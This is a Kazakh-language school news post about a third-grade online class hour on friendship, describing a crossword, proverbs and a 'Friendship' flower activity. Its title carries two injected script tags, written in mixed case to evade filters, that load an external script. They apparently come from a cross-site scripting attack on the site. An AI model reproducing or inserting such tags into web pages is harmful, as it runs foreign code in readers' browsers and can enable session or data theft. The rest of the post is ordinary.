«Достық туралы сөйлесейік» тақырыбында 3-сыныпта сынып сағатын өткізу туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.01.2021

Өткізу күні 14.01.21 ж.

Өткізу формасы-іскерлік ойын (онлайн).

Сынып сағаты оқушылардың бойында адамгершілік қасиеттерді қалыптастыру, дос бола білу, достықты сақтау мақсатында өткізілді.

Оқушылар сөзжұмбақты шешіп, сынып сағатының тақырыбын атай алды. Жеке сөздерден достық туралы мақал-мәтелдер жиналды. Содан кейін нағыз досының жағымды қасиеттерінен "Достық" гүлі жасалды. Бұл гүлді құрастырғаннан кейін балалар тек нағыз дос қана осындай қасиеттерге ие бола алатындығын түсінді. Олар өздері үшін мұндай қасиеттерге ие адам ішкі жағынан ғана емес, сыртқы жағынан да әдемі деген тұжырым жасады.

Сынып жетекшісі: Сидельникова В. В.

Просмотров: 580


Пікір қосу



Деректерді қолтаңбаға қосу